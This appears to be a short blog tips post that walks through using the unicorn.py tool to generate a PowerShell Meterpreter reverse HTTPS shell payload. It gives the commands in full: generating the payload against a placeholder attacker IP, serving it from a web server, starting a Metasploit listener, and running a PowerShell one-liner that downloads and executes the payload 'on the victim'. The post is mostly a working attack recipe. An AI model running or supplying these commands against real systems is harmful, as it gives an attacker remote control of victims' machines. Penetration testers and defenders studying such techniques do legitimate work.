Tips & Tricks

Using Unicorn.py to Automate PowerShell Meterpeter Shells

There’s an awesome tool on Github you can download by running the following command.

sudo git clone https://github.com/trustedsec/unicorn.git

Running the Python script will generate some output that you can copy/paste to create the necessary payload.

python unicorn.py

For example, I can quickly generate a PowerShell reverse shell payload by running the following command.

sudo python unicorn.py windows/meterpreter/reverse_https <attackerIP> 443

That command created two files.

powershell_attack.txt – Contains my malicious PowerShell payload.
unicorn.rc – Will allow us to easily spin up a listener in Metasploit.

Let’s copy both of these files and move them over to where we want them. I will place powershell_attack.txt in a directory that I’m hosting up w/ a webserver, and then I’ll place unicorn.rc into a directory that I want to start my Metasploit listener within.

I’ll start my Metasploit listener with the following code.

sudo msfconsole -r unicorn.rc

And then we just need to execute the following PowerShell code on the victim.

powershell "IEX(New-Object Net.WebClient).downloadString('http://<attackerIP>/powershell_attack.txt')"

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s